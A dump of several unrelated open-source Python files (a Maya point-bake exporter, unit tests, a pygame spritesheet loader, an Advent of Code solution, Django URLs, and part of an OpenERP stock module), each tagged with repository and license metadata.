Copyright (C) 2011 Jon Macey
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import maya.OpenMaya as OM
import maya.OpenMayaAnim as OMA
import maya.OpenMayaMPx as OMX
import maya.cmds as cmds
import sys, math
########################################################################################################################
## @brief simple function to write data out with tabs for a well formatted xml file
## @param[in] _file the file pointer to write data too
## @param[in] _nTabs number of tabs to write before the data
## @param[in] _data the actual data to write out to the file
########################################################################################################################
def WriteData(_file,_nTabs,_data) :
for i in range(0,_nTabs) :
_file.write("\t")
_file.write(_data)
_file.write("\n")
########################################################################################################################
## @brief function to extract and write out the xml data to a file, we don't use any XML
## lib so there is no real check for correct formatting of the data, be carful!
## @param[in] _fileName the file name to open
## @param[in] _name name of the mesh selected
## @param[in] _startFrame the start frame for the export
## @param[in] _endFrame the end frame for the export
########################################################################################################################
def NCCAPointBake(_fileName,_name,_startFrame,_endFrame) :
# grab the selected object
selected = OM.MSelectionList()
obj=OM.MObject( )
selected.add(_name)
selected.getDependNode(0,obj)
# get the parent transform
fn = OM.MFnTransform(obj)
Mesh=""
oChild = fn.child(0)
# check to see if what we have is a mesh
if(oChild.apiTypeStr()=="kMesh") :
print "got Mesh"
# get our mesh
Mesh=OM.MFnMesh(oChild)
else :
print "Didn't get mesh ", oChild.apiType()
return
# now we try and open the file for writing
try :
file=open(str(_fileName[0]),'w')
# if this fails catch the error and exit
except IOError :
print "Error opening file",str(_fileName)
return
# set the frame to start
print "PB get anim control"
currFrame=OM.MTime()
anim=OMA.MAnimControl()
# as these can take time to process we have an interupter to allow for the process to be
# stopped
interupter=OM.MComputation()
# set the start of the heavy computation
interupter.beginComputation()
# now we set the tab level to 0 for the initial write to the file
tabIndent=0
# now we get the mesh number of points
numPoints = cmds.polyEvaluate( _name, v=True)
# write the xml headers
file.write("<?xml version=\"1.0\" encoding=\"UTF-8\" ?>\n")
file.write("<NCCAPointBake>\n")
# up the tab level
tabIndent=tabIndent+1
# write the initial header data
WriteData(file,tabIndent,"<MeshName> %s </MeshName>" %(_name))
WriteData(file,tabIndent,"<NumVerts> %d </NumVerts>" %(numPoints))
WriteData(file,tabIndent,"<StartFrame> %s </StartFrame>" %(_startFrame))
WriteData(file,tabIndent,"<EndFrame> %s </EndFrame>" %(_endFrame))
WriteData(file,tabIndent,"<NumFrames> %s </NumFrames>" %(_endFrame-_startFrame))
WriteData(file,tabIndent,"<TranslateMode> %s </TranslateMode>" %("absolute"))
# now for every frame write out the vertex data
for frame in range(_startFrame,_endFrame) :
print "Doing frame %04d" %(frame)
# move to the correct frame
currFrame.setValue (frame)
anim.setCurrentTime(currFrame)
# write out the frame tag
WriteData(file,tabIndent,"<Frame number=\"%d\">" %(frame))
tabIndent=tabIndent+1
for vertex in range(0,numPoints) :
# now the actual vertex data for the current mesh index value
data = cmds.xform( (_name+ ".vtx["+str(vertex)+"]"), q=True, ws=True, t=True )
WriteData(file,tabIndent,"<Vertex number=\"%d\" attrib=\"translate\"> %f %f %f </Vertex>" %(vertex,data[0],data[1],data[2]))
# now un-indent as we have ended the frame
tabIndent=tabIndent-1
WriteData(file,tabIndent,"</Frame>")
# if we have interupted exit and finish
if interupter.isInterruptRequested() :
file.write("</NCCAPointBake>\n")
file.close()
print "File export interrupted ";
return
# now finish
file.write("</NCCAPointBake>\n")
# and close the file
file.close()
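# For orientation (reconstructed from the WriteData calls above; the values
# are illustrative): the exported file looks roughly like
#   <?xml version="1.0" encoding="UTF-8" ?>
#   <NCCAPointBake>
#       <MeshName> pCube1 </MeshName>
#       <NumVerts> 8 </NumVerts>
#       <StartFrame> 1 </StartFrame>
#       <EndFrame> 120 </EndFrame>
#       ...
#       <Frame number="1">
#           <Vertex number="0" attrib="translate"> 0.5 0.5 0.5 </Vertex>
#           ...
#       </Frame>
#   </NCCAPointBake>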
########################################################################################################################
## @brief actual function call used to do the import
########################################################################################################################
class PointBakeExport() :
########################################################################################################################
# @brief ctor
########################################################################################################################
def __init__(self) :
# get the currently selected objects and make sure we have only one object
selected = OM.MSelectionList()
OM.MGlobal.getActiveSelectionList(selected)
self.selectedObjects = []
selected.getSelectionStrings(self.selectedObjects)
if len(self.selectedObjects) == 0 :
cmds.confirmDialog( title='No objects Selected', message='Select a Mesh Object', button=['Ok'], defaultButton='Ok', cancelButton='Ok', dismissString='Ok' )
elif len(self.selectedObjects) > 1 :
cmds.confirmDialog( title='Select One Object', message='Only one Mesh may be exported at a time', button=['Ok'], defaultButton='Ok', cancelButton='Ok', dismissString='Ok' )
# now we have the correct criteria we can proceed with the export
else :
# get the start and end values for our UI sliders
anim=OMA.MAnimControl()
minTime=anim.minTime()
maxTime=anim.maxTime()
self.m_start=int(minTime.value())
self.m_end=int(maxTime.value())
# now we create a window ready to populate the components
self.m_window = cmds.window( title='NCCA Pointbake Export' )
# create a layout
cmds.columnLayout()
# create two sliders for start and end we also attach methods to be called when the slider
# changes
self.m_startSlider=cmds.intSliderGrp( changeCommand=self.startChanged,field=True, label='Start Frame', minValue=self.m_start, maxValue=self.m_end, fieldMinValue=self.m_start, fieldMaxValue=self.m_end, value=self.m_start )
self.m_endSlider=cmds.intSliderGrp( changeCommand=self.endChanged ,field=True, label='End Frame', minValue=self.m_start, maxValue=self.m_end, fieldMinValue=self.m_end, fieldMaxValue=self.m_end, value=self.m_end )
# create a button and add the method called when pressed
cmds.button( label='Export', command=self.export )
# finally show the window
cmds.showWindow( self.m_window )
########################################################################################################################
# @brief export method attached ot the button, this will be executed once every time
# the button is pressed
# @param *args the arguments passed from the button
########################################################################################################################
def export(self,*args) :
# get the file name to save too
basicFilter = "*.xml"
file=cmds.fileDialog2(caption="Please select file to save",fileFilter=basicFilter, dialogStyle=2)
# check we get a filename and then save
if file !="" :
if self.m_start >= self.m_end :
cmds.confirmDialog( title='Range Error', message='start >= end', button=['Ok'], defaultButton='Ok', cancelButton='Ok', dismissString='Ok' )
else :
NCCAPointBake(file,self.selectedObjects[0],self.m_start,self.m_end)
# finally remove the export window
cmds.deleteUI( self.m_window, window=True )
########################################################################################################################
# @brief this is called every time the slider is changed (i.e. a new value)
# @param *args the arguments passed from the button [0] is the numeric value
########################################################################################################################
def startChanged(self, *args) :
self.m_start=args[0]
########################################################################################################################
# @brief this is called every time the slider is changed (i.e. a new value)
# @param *args the arguments passed from the button [0] is the numeric value
########################################################################################################################
def endChanged(self, *args) :
self.m_end=args[0]
| NCCA/NGL6Demos | PointBake/ImportExportScripts/NCCAPointBakeMayaExport.py | Python | gpl-2.0 | 9,250 |
import unittest
from checkQC.handlers.cluster_pf_handler import ClusterPFHandler
from tests.test_utils import get_stats_json
from tests.handlers.handler_test_base import HandlerTestBase
class TestClusterPFHandler(HandlerTestBase):
def setUp(self):
key = "ConversionResults"
qc_config = {'name': 'TotalClustersPF', 'error': '50', 'warning': '110'}
value = get_stats_json()["ConversionResults"]
cluster_pf_handler = ClusterPFHandler(qc_config)
cluster_pf_handler.collect((key, value))
self.cluster_pf_handler = cluster_pf_handler
def set_qc_config(self, qc_config):
self.cluster_pf_handler.qc_config = qc_config
def test_all_is_fine(self):
qc_config = {'name': 'TotalClustersPF', 'error': 'unknown', 'warning': '110'}
self.set_qc_config(qc_config)
errors_and_warnings = list(self.cluster_pf_handler.check_qc())
self.assertEqual(errors_and_warnings, [])
def test_warning(self):
qc_config = {'name': 'TotalClustersPF', 'error': '100', 'warning': '170'}
self.set_qc_config(qc_config)
errors_and_warnings = list(self.cluster_pf_handler.check_qc())
self.assertEqual(len(errors_and_warnings), 2)
class_names = self.map_errors_and_warnings_to_class_names(errors_and_warnings)
self.assertListEqual(class_names, ['QCErrorWarning', 'QCErrorWarning'])
def test_error(self):
qc_config = {'name': 'TotalClustersPF', 'error': '170', 'warning': '180'}
self.set_qc_config(qc_config)
errors_and_warnings = list(self.cluster_pf_handler.check_qc())
self.assertEqual(len(errors_and_warnings), 2)
class_names = self.map_errors_and_warnings_to_class_names(errors_and_warnings)
self.assertListEqual(class_names, ['QCErrorFatal', 'QCErrorFatal'])
def test_warning_when_error_unknown(self):
qc_config = {'name': 'TotalClustersPF', 'error': 'unknown', 'warning': '170'}
self.set_qc_config(qc_config)
errors_and_warnings = list(self.cluster_pf_handler.check_qc())
self.assertEqual(len(errors_and_warnings), 2)
class_names = self.map_errors_and_warnings_to_class_names(errors_and_warnings)
self.assertListEqual(class_names, ['QCErrorWarning', 'QCErrorWarning'])
if __name__ == '__main__':
unittest.main()
| monikaBrandt/checkQC | tests/handlers/test_cluster_pf_handler.py | Python | gpl-3.0 | 2,350 |
"""
Template for Characters
Copy this module up one level and name it as you like, then
use it as a template to create your own Character class.
To make new logins default to creating characters
of your new type, change settings.BASE_CHARACTER_TYPECLASS to point to
your new class, e.g.
settings.BASE_CHARACTER_TYPECLASS = "game.gamesrc.objects.mychar.MyChar"
Note that objects already created in the database will not notice
this change, you have to convert them manually e.g. with the
@typeclass command.
"""
from ev import Character
class ExampleCharacter(Character):
"""
The Character is like any normal Object (see example/object.py for
a list of properties and methods), except it actually implements
some of its hook methods to do some work:
at_basetype_setup - always assigns the default_cmdset to this object type
(important!)sets locks so character cannot be picked up
and its commands only be called by itself, not anyone else.
(to change things, use at_object_creation() instead)
at_after_move - launches the "look" command
at_disconnect - stores the current location, so the "unconnected" character
object does not need to stay on grid but can be given a
None-location while offline.
at_post_login - retrieves the character's old location and puts it back
on the grid with a "charname has connected" message echoed
to the room
"""
pass
| YourCyborg/Sun-RPI | game/gamesrc/objects/examples/character.py | Python | bsd-3-clause | 1,578 |
#!/usr/bin/env python
"""
http://adventofcode.com/day/24
Part 1
------
It's Christmas Eve, and Santa is loading up the sleigh for this year's
deliveries. However, there's one small problem: he can't get the sleigh
to balance. If it isn't balanced, he can't defy physics, and nobody gets
presents this year.
No pressure.
Santa has provided you a list of the weights of every package he needs
to fit on the sleigh. The packages need to be split into three groups
of exactly the same weight, and every package has to fit. The first group
goes in the passenger compartment of the sleigh, and the second and third
go in containers on either side. Only when all three groups weigh exactly
the same amount will the sleigh be able to fly. Defying physics has rules,
you know!
Of course, that's not the only problem. The first group - the one going in
the passenger compartment - needs as few packages as possible so that Santa
has some legroom left over. It doesn't matter how many packages are in either
of the other two groups, so long as all of the groups weigh the same.
Furthermore, Santa tells you, if there are multiple ways to arrange the
packages such that the fewest possible are in the first group, you need to
choose the way where the first group has the smallest quantum entanglement
to reduce the chance of any "complications". The quantum entanglement of
a group of packages is the product of their weights, that is, the value you
get when you multiply their weights together. Only consider quantum
entanglement if the first group has the fewest possible number of packages
in it and all groups weigh the same amount.
For example, suppose you have ten packages with weights 1 through 5 and 7
through 11. For this situation, the unique first groups, their quantum
entanglements, and a way to divide the remaining packages are as follows:
Group 1; Group 2; Group 3
11 9 (QE= 99); 10 8 2; 7 5 4 3 1
10 9 1 (QE= 90); 11 7 2; 8 5 4 3
10 8 2 (QE=160); 11 9; 7 5 4 3 1
10 7 3 (QE=210); 11 9; 8 5 4 2 1
10 5 4 1 (QE=200); 11 9; 8 7 3 2
10 5 3 2 (QE=300); 11 9; 8 7 4 1
10 4 3 2 1 (QE=240); 11 9; 8 7 5
9 8 3 (QE=216); 11 7 2; 10 5 4 1
9 7 4 (QE=252); 11 8 1; 10 5 3 2
9 5 4 2 (QE=360); 11 8 1; 10 7 3
8 7 5 (QE=280); 11 9; 10 4 3 2 1
8 5 4 3 (QE=480); 11 9; 10 7 2 1
7 5 4 3 1 (QE=420); 11 9; 10 8 2
Of these, although 10 9 1 has the smallest quantum entanglement (90), the
configuration with only two packages, 11 9, in the passenger compartment
gives Santa the most legroom and wins. In this situation, the quantum
entanglement for the ideal configuration is therefore 99. Had there been
two configurations with only two packages in the first group, the one with
the smaller quantum entanglement would be chosen.
What is the quantum entanglement of the first group of packages in the
ideal configuration?
Part 2
------
"""
from __future__ import print_function, unicode_literals
from functools import reduce
from itertools import combinations
from operator import mul
import os
import sys
INFILE = 'inputs/input24.txt'
def find(weights, group_count):
# each group must weigh total/group_count, so compare subsets to that target
target = sum(weights) // group_count
for i in range(1, len(weights)):
qe_list = [reduce(mul, c) for c in combinations(weights, i)
if sum(c) == target]
if qe_list:
return min(qe_list)
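# Worked check against the docstring example (added for clarity): for weights
# 1-5 and 7-11 split into 3 groups, target = 60 // 3 = 20; the smallest first
# group hitting 20 is (11, 9), so find(weights, 3) returns 11 * 9 = 99.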
def main():
weights = list()
options = list()
with open(INFILE) as f:
for line in f:
weights.append(int(line.strip()))
# Leftover brute-force experiment (disabled; the loop below never executes)
for p in []: # permutations(weights):
for i in range(len(weights)):
for j in range(len(weights) - i):
k = len(weights) - i - j
all_positive = i > 0 and j > 0 and k > 0
all_included = i + j + k == len(weights)
if all_positive and all_included:
group1 = weights[:i]
group2 = weights[i+1:i+j]
group3 = weights[i+j+1:]
if sum(group1) == sum(group2) == sum(group3):
print('> match! {} {} {} / {} {} {} / {} {} {}'.format(i, j, k, len(group1), len(group2), len(group3), sum(group1), sum(group2), sum(group3)))
#print('{} j={} j={} k={}'.format(len(weights), i, j, k))
#print(' {}/{}/{}'.format(len(group1), len(group2), len(group3)))
# Part 1
msg = '[Python] Puzzle 24-1: {}'
print(msg.format(find(weights, 3)))
# Part 2
msg = '[Python] Puzzle 24-2: {}'
print(msg.format(find(weights, 4)))
if __name__ == '__main__':
main()
| rnelson/adventofcode | advent2015/partial_day24.py | Python | mit | 4,689 |
# Pygame spritesheet example
# Licensed under LGPLv3
# This class handles sprite sheets
# This was taken from www.scriptefun.com/transcript-2-using
# sprite-sheets-and-drawing-the-background
# I've added some code to fail if the file wasn't found..
# Note: When calling images_at the rect is the format:
# (x, y, x + offset, y + offset)
# File based in Source: http://www.pygame.org/wiki/Spritesheet?parent=CookBook
import pygame
from constants import PERSONA_SIZE
class SpriteSheet(object):
def __init__(self, filename):
try:
self.sheet = pygame.image.load(filename).convert()
except pygame.error, message:
print 'Unable to load spritesheet image:', filename
raise SystemExit, message
# Load a specific image from a specific rectangle
def image_at(self, rectangle, colorkey = None, resize=True):
"Loads image from x,y,x+offset,y+offset"
rect = pygame.Rect(rectangle)
image = pygame.Surface(rect.size).convert()
image.blit(self.sheet, (0, 0), rect)
if colorkey is not None:
if colorkey is -1:
colorkey = image.get_at((0,0))
image.set_colorkey(colorkey, pygame.RLEACCEL)
# fits sprite to square size
if resize:
rect.fit((rect.x, rect.y), PERSONA_SIZE)
return pygame.transform.smoothscale(image, PERSONA_SIZE)
else:
return image
# Load a whole bunch of images and return them as a list
def images_at(self, rects, colorkey = None):
"Loads multiple images, supply a list of coordinates"
return [self.image_at(rect, colorkey) for rect in rects]
# Load a whole strip of images
def load_strip(self, rect, image_count, colorkey = None):
"Loads a strip of images and returns them as a list"
tups = [(rect[0]+rect[2]*x, rect[1], rect[2], rect[3])
for x in range(image_count)]
return self.images_at(tups, colorkey)
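# Illustrative usage (a sketch; the file name and rectangles are hypothetical):
#   ss = SpriteSheet('hero_sheet.png')
#   idle = ss.image_at((0, 0, 32, 32), colorkey=-1)        # one frame
#   walk = ss.load_strip((0, 32, 32, 32), 8, colorkey=-1)  # list of 8 frames
# Note that image_at() scales frames to PERSONA_SIZE unless resize=False.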
class BaseAnimation(object):
"""sprite strip animator
This class provides an iterator (iter() and next() methods), and a
__add__() method for joining strips which comes in handy when a
strip wraps to the next row.
"""
def __init__(self, images, loop=False, frames=1):
"""
BaseAnimation class
Receives an array and iterates it considering the frame rate
and loop
loop is a boolean that, when True, causes the next() method to
loop. If False, the terminal case raises StopIteration.
frames is the number of ticks to return the same image before
the iterator advances to the next image.
"""
self.i = 0
self.loop = loop
self.frames = frames
self.f = frames
self.images = images
def iter(self):
self.i = 0
self.f = self.frames
return self
def next(self):
if self.i >= len(self.images):
if not self.loop:
raise StopIteration
else:
self.i = 0
image = self.images[self.i]
self.f -= 1
if self.f == 0:
self.i += 1
self.f = self.frames
return image
def start(self):
pass
def stop(self):
pass
def __add__(self, ss):
self.images.extend(ss.images)
return self
class SpriteStripAnim(BaseAnimation):
"""sprite strip animator"""
def __init__(self, filename, rect, count, colorkey=None,
loop=False, frames=1):
"""construct a SpriteStripAnim
filename, rect, count, and colorkey are the same arguments used
by spritesheet.load_strip.
"""
self.filename = filename
ss = SpriteSheet(filename)
self.images = ss.load_strip(rect, count, colorkey)
super(SpriteStripAnim, self).__init__(self.images, loop, frames)
| adalbas/sfgame | sfgame/game/spritesheet.py | Python | apache-2.0 | 4,014 |
"""cl.utils"""
from __future__ import absolute_import
import operator
from importlib import import_module
from itertools import imap, ifilter
from kombu.utils import cached_property # noqa
__all__ = ["force_list", "flatten", "get_cls_by_name",
"instantiate", "cached_property"]
def force_list(obj):
if not hasattr(obj, "__iter__"):
return [obj]
return obj
def flatten(it):
if it:
try:
return reduce(operator.add,
imap(force_list, ifilter(None, it)))
except TypeError:
return []
return it
def first(it, default=None):
try:
it.next()
except StopIteration:
return default
def first_or_raise(it, exc):
for reply in it:
if not isinstance(reply, Exception):
return reply
raise exc
def get_cls_by_name(name, aliases={}, imp=None):
"""Get class by name.
The name should be the full dot-separated path to the class::
modulename.ClassName
Example::
celery.concurrency.processes.TaskPool
^- class name
If `aliases` is provided, a dict containing short name/long name
mappings, the name is looked up in the aliases first.
Examples:
>>> get_cls_by_name("celery.concurrency.processes.TaskPool")
<class 'celery.concurrency.processes.TaskPool'>
>>> get_cls_by_name("default", {
... "default": "celery.concurrency.processes.TaskPool"})
<class 'celery.concurrency.processes.TaskPool'>
# Does not try to look up non-string names.
>>> from celery.concurrency.processes import TaskPool
>>> get_cls_by_name(TaskPool) is TaskPool
True
"""
if imp is None:
imp = import_module
if not isinstance(name, basestring):
return name # already a class
name = aliases.get(name) or name
module_name, _, cls_name = name.rpartition(".")
try:
module = imp(module_name)
except ValueError, exc:
raise ValueError("Couldn't import %r: %s" % (name, exc))
return getattr(module, cls_name)
def instantiate(name, *args, **kwargs):
"""Instantiate class by name.
See :func:`get_cls_by_name`.
"""
return get_cls_by_name(name)(*args, **kwargs)
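# Illustrative example (not from the original module), assuming the standard
# library is importable: the first call returns the class, the second an
# instance of it.
#   cls = get_cls_by_name("collections.OrderedDict")
#   obj = instantiate("collections.OrderedDict")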
def abbr(S, max, ellipsis="..."):
if S and len(S) > max:
return ellipsis and (S[:max - len(ellipsis)] + ellipsis) or S[:max]
return S
def shortuuid(u):
if '-' in u:
return u[:u.index('-')]
return abbr(u, 16)
| pexip/os-python-cl | cl/utils/__init__.py | Python | bsd-3-clause | 2,587 |
"""ber_serkr URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
#from material.frontend import urls as frontend_urls
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^', include('hamask.urls')),
]
| rawenihcam/BER-SERKR | ber_serkr/urls.py | Python | mit | 867 |
#!/usr/bin/env python
from nose.tools import *
from nose import SkipTest
import networkx as nx
class TestFlowClosenessCentrality(object):
numpy=1 # nosetests attribute, use nosetests -a 'not numpy' to skip test
@classmethod
def setupClass(cls):
global np
try:
import numpy as np
import scipy
except ImportError:
raise SkipTest('NumPy not available.')
def test_K4(self):
"""Closeness centrality: K4"""
G=nx.complete_graph(4)
b=nx.current_flow_closeness_centrality(G)
b_answer={0: 2.0/3, 1: 2.0/3, 2: 2.0/3, 3: 2.0/3}
for n in sorted(G):
assert_almost_equal(b[n],b_answer[n])
def test_P4(self):
"""Closeness centrality: P4"""
G=nx.path_graph(4)
b=nx.current_flow_closeness_centrality(G)
b_answer={0: 1.0/6, 1: 1.0/4, 2: 1.0/4, 3:1.0/6}
for n in sorted(G):
assert_almost_equal(b[n],b_answer[n])
def test_star(self):
"""Closeness centrality: star """
G=nx.Graph()
nx.add_star(G, ['a', 'b', 'c', 'd'])
b=nx.current_flow_closeness_centrality(G)
b_answer={'a': 1.0/3, 'b': 0.6/3, 'c': 0.6/3, 'd':0.6/3}
for n in sorted(G):
assert_almost_equal(b[n],b_answer[n])
class TestWeightedFlowClosenessCentrality(object):
pass
| cmtm/networkx | networkx/algorithms/centrality/tests/test_current_flow_closeness.py | Python | bsd-3-clause | 1,387 |
# -*- coding: utf-8 -*-
#
# Copyright 2017 Ricequant, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
VALID_HISTORY_FIELDS = [
'datetime', 'open', 'close', 'high', 'low', 'total_turnover', 'volume',
'acc_net_value', 'discount_rate', 'unit_net_value',
'limit_up', 'limit_down', 'open_interest', 'basis_spread', 'settlement', 'prev_settlement'
]
VALID_GET_PRICE_FIELDS = [
'OpeningPx', 'ClosingPx', 'HighPx', 'LowPx', 'TotalTurnover', 'TotalVolumeTraded',
'AccNetValue', 'UnitNetValue', 'DiscountRate',
'SettlPx', 'PrevSettlPx', 'OpenInterest', 'BasisSpread', 'HighLimitPx', 'LowLimitPx'
]
VALID_TENORS = [
'0S', '1M', '2M', '3M', '6M', '9M', '1Y', '2Y', '3Y', '4Y',
'5Y', '6Y', '7Y', '8Y', '9Y', '10Y', '15Y', '20Y', '30Y',
'40Y', '50Y'
]
VALID_INSTRUMENT_TYPES = [
'CS', 'Future', 'INDX', 'ETF', 'LOF', 'SF', 'FenjiA', 'FenjiB', 'FenjiMu',
'Stock', 'Fund', 'Index'
]
VALID_XUEQIU_FIELDS = [
'new_comments', 'total_comments',
'new_followers', 'total_followers',
'sell_actions', 'buy_actions',
]
VALID_MARGIN_FIELDS = [
'margin_balance',
'buy_on_margin_value',
'short_sell_quantity',
'margin_repayment',
'short_balance_quantity',
'short_repayment_quantity',
'short_balance',
'total_balance'
]
VALID_SHARE_FIELDS = [
'total', 'circulation_a', 'management_circulation', 'non_circulation_a', 'total_a'
]
VALID_TURNOVER_FIELDS = (
'today',
'week',
'month',
'three_month',
'six_month',
'year',
'current_year',
'total',
)
| xclxxl414/rqalpha | rqalpha/api/names.py | Python | apache-2.0 | 2,048 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from datetime import datetime
from dateutil.relativedelta import relativedelta
import time
from operator import itemgetter
from itertools import groupby
from openerp.osv import fields, osv, orm
from openerp.tools.translate import _
from openerp import netsvc
from openerp import tools
from openerp.tools import float_compare, DEFAULT_SERVER_DATETIME_FORMAT
import openerp.addons.decimal_precision as dp
import logging
_logger = logging.getLogger(__name__)
#----------------------------------------------------------
# Incoterms
#----------------------------------------------------------
class stock_incoterms(osv.osv):
_name = "stock.incoterms"
_description = "Incoterms"
_columns = {
        'name': fields.char('Name', size=64, required=True, help="Incoterms are a series of sales terms. They are used to divide transaction costs and responsibilities between buyer and seller and reflect state-of-the-art transportation practices."),
'code': fields.char('Code', size=3, required=True, help="Code for Incoterms"),
'active': fields.boolean('Active', help="By unchecking the active field, you may hide an INCOTERM without deleting it."),
}
_defaults = {
'active': True,
}
stock_incoterms()
class stock_journal(osv.osv):
_name = "stock.journal"
_description = "Stock Journal"
_columns = {
'name': fields.char('Stock Journal', size=32, required=True),
'user_id': fields.many2one('res.users', 'Responsible'),
}
_defaults = {
'user_id': lambda s, c, u, ctx: u
}
stock_journal()
#----------------------------------------------------------
# Stock Location
#----------------------------------------------------------
class stock_location(osv.osv):
_name = "stock.location"
_description = "Location"
_parent_name = "location_id"
_parent_store = True
_parent_order = 'posz,name'
_order = 'parent_left'
# TODO: implement name_search() in a way that matches the results of name_get!
def name_get(self, cr, uid, ids, context=None):
# always return the full hierarchical name
res = self._complete_name(cr, uid, ids, 'complete_name', None, context=context)
return res.items()
def _complete_name(self, cr, uid, ids, name, args, context=None):
""" Forms complete name of location from parent location to child location.
@return: Dictionary of values
"""
res = {}
for m in self.browse(cr, uid, ids, context=context):
names = [m.name]
parent = m.location_id
while parent:
names.append(parent.name)
parent = parent.location_id
res[m.id] = ' / '.join(reversed(names))
return res
def _get_sublocations(self, cr, uid, ids, context=None):
""" return all sublocations of the given stock locations (included) """
return self.search(cr, uid, [('id', 'child_of', ids)], context=context)
def _product_value(self, cr, uid, ids, field_names, arg, context=None):
"""Computes stock value (real and virtual) for a product, as well as stock qty (real and virtual).
@param field_names: Name of field
@return: Dictionary of values
"""
prod_id = context and context.get('product_id', False)
if not prod_id:
return dict([(i, {}.fromkeys(field_names, 0.0)) for i in ids])
product_product_obj = self.pool.get('product.product')
cr.execute('select distinct product_id, location_id from stock_move where location_id in %s', (tuple(ids), ))
dict1 = cr.dictfetchall()
cr.execute('select distinct product_id, location_dest_id as location_id from stock_move where location_dest_id in %s', (tuple(ids), ))
dict2 = cr.dictfetchall()
res_products_by_location = sorted(dict1+dict2, key=itemgetter('location_id'))
products_by_location = dict((k, [v['product_id'] for v in itr]) for k, itr in groupby(res_products_by_location, itemgetter('location_id')))
result = dict([(i, {}.fromkeys(field_names, 0.0)) for i in ids])
result.update(dict([(i, {}.fromkeys(field_names, 0.0)) for i in list(set([aaa['location_id'] for aaa in res_products_by_location]))]))
currency_id = self.pool.get('res.users').browse(cr, uid, uid).company_id.currency_id.id
currency_obj = self.pool.get('res.currency')
currency = currency_obj.browse(cr, uid, currency_id, context=context)
for loc_id, product_ids in products_by_location.items():
if prod_id:
product_ids = [prod_id]
c = (context or {}).copy()
c['location'] = loc_id
for prod in product_product_obj.browse(cr, uid, product_ids, context=c):
for f in field_names:
if f == 'stock_real':
if loc_id not in result:
result[loc_id] = {}
result[loc_id][f] += prod.qty_available
elif f == 'stock_virtual':
result[loc_id][f] += prod.virtual_available
elif f == 'stock_real_value':
amount = prod.qty_available * prod.standard_price
amount = currency_obj.round(cr, uid, currency, amount)
result[loc_id][f] += amount
elif f == 'stock_virtual_value':
amount = prod.virtual_available * prod.standard_price
amount = currency_obj.round(cr, uid, currency, amount)
result[loc_id][f] += amount
return result
_columns = {
'name': fields.char('Location Name', size=64, required=True, translate=True),
'active': fields.boolean('Active', help="By unchecking the active field, you may hide a location without deleting it."),
'usage': fields.selection([('supplier', 'Supplier Location'), ('view', 'View'), ('internal', 'Internal Location'), ('customer', 'Customer Location'), ('inventory', 'Inventory'), ('procurement', 'Procurement'), ('production', 'Production'), ('transit', 'Transit Location for Inter-Companies Transfers')], 'Location Type', required=True,
help="""* Supplier Location: Virtual location representing the source location for products coming from your suppliers
\n* View: Virtual location used to create a hierarchical structures for your warehouse, aggregating its child locations ; can't directly contain products
\n* Internal Location: Physical locations inside your own warehouses,
\n* Customer Location: Virtual location representing the destination location for products sent to your customers
\n* Inventory: Virtual location serving as counterpart for inventory operations used to correct stock levels (Physical inventories)
\n* Procurement: Virtual location serving as temporary counterpart for procurement operations when the source (supplier or production) is not known yet. This location should be empty when the procurement scheduler has finished running.
\n* Production: Virtual counterpart location for production operations: this location consumes the raw material and produces finished products
""", select = True),
# temporarily removed, as it's unused: 'allocation_method': fields.selection([('fifo', 'FIFO'), ('lifo', 'LIFO'), ('nearest', 'Nearest')], 'Allocation Method', required=True),
'complete_name': fields.function(_complete_name, type='char', size=256, string="Location Name",
store={'stock.location': (_get_sublocations, ['name', 'location_id'], 10)}),
'stock_real': fields.function(_product_value, type='float', string='Real Stock', multi="stock"),
'stock_virtual': fields.function(_product_value, type='float', string='Virtual Stock', multi="stock"),
'location_id': fields.many2one('stock.location', 'Parent Location', select=True, ondelete='cascade'),
'child_ids': fields.one2many('stock.location', 'location_id', 'Contains'),
'chained_journal_id': fields.many2one('stock.journal', 'Chaining Journal',help="Inventory Journal in which the chained move will be written, if the Chaining Type is not Transparent (no journal is used if left empty)"),
'chained_location_id': fields.many2one('stock.location', 'Chained Location If Fixed'),
'chained_location_type': fields.selection([('none', 'None'), ('customer', 'Customer'), ('fixed', 'Fixed Location')],
'Chained Location Type', required=True,
help="Determines whether this location is chained to another location, i.e. any incoming product in this location \n" \
"should next go to the chained location. The chained location is determined according to the type :"\
"\n* None: No chaining at all"\
"\n* Customer: The chained location will be taken from the Customer Location field on the Partner form of the Partner that is specified in the Picking list of the incoming products." \
"\n* Fixed Location: The chained location is taken from the next field: Chained Location if Fixed." \
),
'chained_auto_packing': fields.selection(
[('auto', 'Automatic Move'), ('manual', 'Manual Operation'), ('transparent', 'Automatic No Step Added')],
'Chaining Type',
required=True,
